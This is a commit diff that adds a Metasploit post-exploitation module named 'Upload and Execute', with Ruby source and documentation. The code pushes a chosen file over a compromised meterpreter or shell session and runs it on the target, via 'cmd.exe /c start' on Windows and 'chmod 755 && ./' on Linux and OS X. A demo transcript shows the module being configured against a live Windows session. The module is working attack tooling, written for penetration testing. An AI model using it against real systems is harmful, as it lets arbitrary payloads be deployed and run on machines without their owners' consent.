Land rapid7#8259, Add post module to upload and execute a file

Author: wchen-r7

documentation/modules/post/multi/manage/upload_exec.md

@@ -0,0 +1,68 @@
+This module allows you to upload a binary file, and automatically execute it.
+
+## Vulnerable Application
+
+The following platforms are supported:
+
+
+* Windows
+* Linux
+* OS X
+
+## Verification Steps
+
+1. Prepare for an executable file you wish to upload and execute.
+2. Obtain a session from the target machine.
+3. In msfconsole, do ```use post/multi/manage/upload_exec```
+4. Set the ```LFILE``` option
+5. Set the ```RFILE``` option
+6. Set the ```SESSION``` option
+7. ```run```
+
+## Options
+
+**LFILE**
+
+The file on your machine that you want to upload to the target machine.
+
+**RFILE**
+
+The file path on the target machine. This defaults to LFILE.
+
+## Demo
+
+```
+msf > use post/multi/manage/upload_exec
+msf post(upload_exec) > show options
+
+Module options (post/multi/manage/upload_exec):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   LFILE                     yes       Local file to upload and execute
+   RFILE                     no        Name of file on target (default is basename of LFILE)
+   SESSION                   yes       The session to run this module on.
+
+msf post(upload_exec) > set lfile /tmp/
+lfile => /tmp/
+msf post(upload_exec) > set lfile /tmp/msg.exe
+lfile => /tmp/msg.exe
+msf post(upload_exec) > set rfile C:\\Users\\sinn3r\\Desktop\\msg.exe
+rfile => C:\Users\sinn3r\Desktop\msg.exe
+msf post(upload_exec) > sessions
+
+Active sessions
+===============
+
+  Id  Type                     Information                               Connection
+  --  ----                     -----------                               ----------
+  1   meterpreter x86/windows  WIN-6NH0Q8CJQVM\sinn3r @ WIN-6NH0Q8CJQVM  192.168.146.1:4444 -> 192.168.146.149:50168 (192.168.146.149)
+
+msf post(upload_exec) > set session 1
+session => 1
+
+msf post(upload_exec) > run
+
+[-] Post interrupted by the console user
+[*] Post module execution completed
+```

modules/post/multi/manage/upload_exec.rb

@@ -0,0 +1,52 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+
+  def initialize(info={})
+    super( update_info( info,
+      'Name'          => 'Upload and Execute',
+      'Description'   => %q{ Push a file and execute it },
+      'License'       => MSF_LICENSE,
+      'Author'        => [ 'egypt'],
+      'Platform'      => [ 'win','linux','osx' ],
+      'SessionTypes'  => [ 'meterpreter','shell' ]
+    ))
+
+    register_options(
+      [
+        OptPath.new('LFILE', [true,'Local file to upload and execute']),
+        OptString.new('RFILE', [false,'Name of file on target (default is basename of LFILE)']),
+      ], self.class)
+  end
+
+  def rfile
+    if datastore['RFILE'].blank?
+      remote_name = File.basename(datastore['LFILE'])
+    else
+      remote_name = datastore['RFILE']
+    end
+
+    remote_name
+  end
+
+  def lfile
+    datastore['LFILE']
+  end
+
+  def run
+    upload_file(rfile, lfile)
+
+    if session.platform.include?("windows")
+      cmd_exec("cmd.exe /c start #{rfile}", nil, 0)
+    else
+      cmd_exec("chmod 755 #{rfile} && ./#{rfile}", nil, 0)
+    end
+    rm_f(rfile)
+  end
+
+end
+